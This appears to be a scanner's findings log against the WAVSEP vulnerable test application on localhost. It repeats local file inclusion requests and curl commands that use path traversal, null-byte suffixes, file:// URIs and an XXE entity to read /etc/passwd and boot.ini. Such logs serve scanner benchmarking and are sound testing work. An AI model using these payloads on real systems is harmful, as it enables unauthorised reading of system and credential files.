Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=.depdb%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=pearcmd.php%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp

Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00 HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Error/Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp?target=Case60-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-BackslashPathReq-Read.jsp%00"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case01-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case07-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case08-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case09-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case11-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case13-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case15-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case17-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case19-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case23-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultEmptyInput-BackslashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case54-LFI-FileClass-FilenameContext-BackslashTraversalRemoval-OSPath-DefaultFullInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case55-LFI-FileClass-FilenameContext-UnixTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2F....%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case56-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Identical/Case58-LFI-FileClass-FilenameContext-WindowsTraversalRemoval-OSPath-DefaultFullInput-SlashPathReq-Read.jsp?target=%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case02-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultFullInput-AnyPathReq-Read.jsp?target=file%3A%2F%2F%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case03-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultRelativeInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case04-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultRelativeInput-AnyPathReq-Read.jsp?target=file%3A%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd"

Vulnerability found in /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp

Linux local file disclosure vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-200Valid/Case05-LFI-FileClass-FilenameContext-Unrestricted-OSPath-DefaultInvalidInput-AnyPathReq-Read.jsp?target=%2Fetc%2Fpasswd HTTP/1.1
Host: 127.0.0.1:8090
